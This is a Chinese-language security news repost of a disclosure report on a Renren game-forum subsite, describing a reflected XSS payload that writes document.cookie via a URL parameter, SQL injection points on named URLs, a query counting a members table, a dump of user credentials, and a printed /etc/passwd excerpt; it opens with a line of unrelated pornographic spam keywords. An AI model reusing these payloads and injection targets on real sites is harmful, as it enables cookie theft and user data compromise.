偷偷摘套内射激情视频,久久精品99国产国产精,中文字幕无线乱码人妻,中文在线中文a,性爽19p

人人網(wǎng)分站SQL注入+反射型xss

安全 數(shù)據(jù)安全
在人人某bbs,反射型跨站,可獲取cookie。在sql注入時有多個注入點,information_schema.columns可用,注入很方便。

 1.人人某bbs。

2.反射型跨站,可獲取cookie。

3.sql注入,多個注入點,information_schema.columns可用,注入很方便。

4.很多個數(shù)據(jù)表,select count(*) from XXX_用戶表,結(jié)果:43998。

5.可讀取系統(tǒng)文件,例如/etc/passwd(其他的路徑?jīng)]找到)。

起因是發(fā)現(xiàn)人人網(wǎng)某分站的phpinfo()(這個沒有找到其他什么)

http://yxzb4.renren.com/index.php

結(jié)果發(fā)現(xiàn),wooyun里面有提交了的,只是沒處理。

http://www.wooyun.org/bugs/wooyun-2010-07040

結(jié)果偶然間,爬行到另外一個站,是一個游戲論壇。

http://yxzb.renren.com/bbs/

發(fā)現(xiàn)存在反射型xss,可獲取cookie

http://yxzb.renren.com/bbs/viewthread.jsp

?extra=<script>document.write(document.cookie)</script>

&tid=9525

人人網(wǎng)分站SQL注入+反射型xss

其中幾個頁面都存在注入,其中一個注入信息:

Target:  http://yxzb.renren.com/bbs/faq.jsp?action=message&id=24

Host IP: 111.1.20.155

Web Server:  Apache-Coyote/1.1

DB Server:  MySQL >=5

Current DB:  jsprun

可查看系統(tǒng)信息:

人人網(wǎng)分站SQL注入+反射型xss

注入的信息:

好多個數(shù)據(jù)庫:

人人網(wǎng)分站SQL注入+反射型xss

執(zhí)行查詢語句,查詢用戶,43998(網(wǎng)站上顯示信息:主題: 31695, 帖子: 304040, 會員: 43998)

select count(*) from  jrun_members

人人網(wǎng)分站SQL注入+反射型xss

用戶名,密碼,郵箱,salt....

人人網(wǎng)分站SQL注入+反射型xss

讀取/etc/passwd

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

...略

未測試是否可以拿到shell

責(zé)任編輯:藍(lán)雨淚 來源: 2cto
相關(guān)推薦

2013-11-14 10:27:54

2019-03-25 07:27:14

XSS漏洞Ecshop

2024-10-12 10:57:21

2019-02-25 09:20:53

2013-10-02 17:56:55

蘇寧易購SA權(quán)限SQL注入

2019-09-17 10:06:46

數(shù)據(jù)庫程序員網(wǎng)絡(luò)安全

2023-03-10 19:36:47

2010-09-09 17:22:14

2011-12-08 14:09:07

2011-12-13 14:15:30

2011-12-08 16:18:40

2011-12-13 13:54:42

2015-10-26 16:01:15

2013-09-03 10:22:02

人人網(wǎng)移動開發(fā)架構(gòu)

2013-09-03 10:10:00

人人網(wǎng)移動開發(fā)架構(gòu)

2013-01-05 14:51:34

JavaScriptjQuery面試

2013-11-27 17:12:27

2012-11-14 17:18:58

2010-12-20 16:04:30

2011-12-12 16:05:59

開放平臺
點贊
收藏

51CTO技術(shù)棧公眾號